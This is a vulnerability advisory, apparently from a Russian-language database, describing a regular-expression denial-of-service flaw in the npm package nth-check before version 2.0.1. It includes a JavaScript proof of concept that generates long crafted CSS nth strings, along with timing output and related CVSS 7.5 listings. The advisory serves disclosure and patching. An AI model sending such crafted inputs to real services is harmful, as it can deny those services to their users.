Описание
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Пакеты
Наименование
nth-check
npm
Затронутые версииВерсия исправления
< 2.0.1
2.0.1
Связанные уязвимости
CVSS3: 7.5
ubuntu
больше 4 лет назад
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
redhat
больше 4 лет назад
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
nvd
больше 4 лет назад
nth-check is vulnerable to Inefficient Regular Expression Complexity
CVSS3: 7.5
debian
больше 4 лет назад
nth-check is vulnerable to Inefficient Regular Expression Complexity